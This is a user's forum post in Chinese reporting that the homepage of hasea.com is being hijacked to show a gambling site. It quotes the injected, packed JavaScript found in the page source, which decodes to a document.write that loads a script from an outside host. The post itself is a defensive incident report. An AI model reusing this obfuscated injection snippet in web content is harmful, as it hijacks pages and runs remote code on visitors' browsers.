|
访问bbs.hasea.com和www.hasea.com时,网页会被来自www.c6300.com(一个奇怪的博彩网站)的内容覆盖。
经查,网页源代码被植入了如下的恶意脚本:
《script》
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8.7(a(\'%9%6%0%3%1%4%0%5%h//g.j.i/f/c.b%1%2%e/d%2\'));',20,20,'3D|22|3E|22javascript|20src|22https|20language|write|document|3Cscript|unescape|js|squerytz|script|3C|tz|www|3A|com|oio00'.split('|'),0,{}))
《/script》
网站内页未受到影响。当我手动禁用JavaScript后,首页的访问恢复正常。
应该不是我接入的ISP发生的劫持,因为当我开了加密的全局梯子以后劫持仍然存在。
盼管理员尽快看到并解决。 |
|